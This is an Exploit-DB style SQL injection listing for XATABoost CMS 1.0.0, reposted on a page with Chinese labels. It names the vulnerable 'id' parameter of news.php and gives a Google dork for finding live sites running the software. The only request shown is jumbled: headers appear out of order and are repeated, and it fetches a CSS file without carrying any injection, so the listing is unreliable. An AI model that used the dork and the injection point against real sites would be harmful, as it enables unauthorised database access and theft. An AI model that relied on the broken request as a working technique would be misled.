XATABoost 1.0.0 – SQL Injection

  • 作者: MgThuraMoeMyint
    日期: 2018-05-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44622/
  • # Exploit Title: XATABoost CMS Sql Injection
    # Google Dork: inurl:php?id= Powered by XATABOOST
    # Date: 02.01.2018
    # Exploit Author: MgThuraMoeMyint
    # Vendor Homepage: http://www2.xataboost.com
    # Version: 1.0.0
    # Tested on: Kali Linux
    # SQL Injection Type: Union Based
    # Example URL: http://localhost/news.php?id=[Injection Point]
    
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/news.php?id=[Injection Point]
    Connection: keep-alive
    GET /xata/nonprofit/000026/css/custom.css.php?x=1c383cd30b7c298ab50293adfecb7b18
    HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/css,*/*;q=0.1
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/news.php?id=[Injection Point]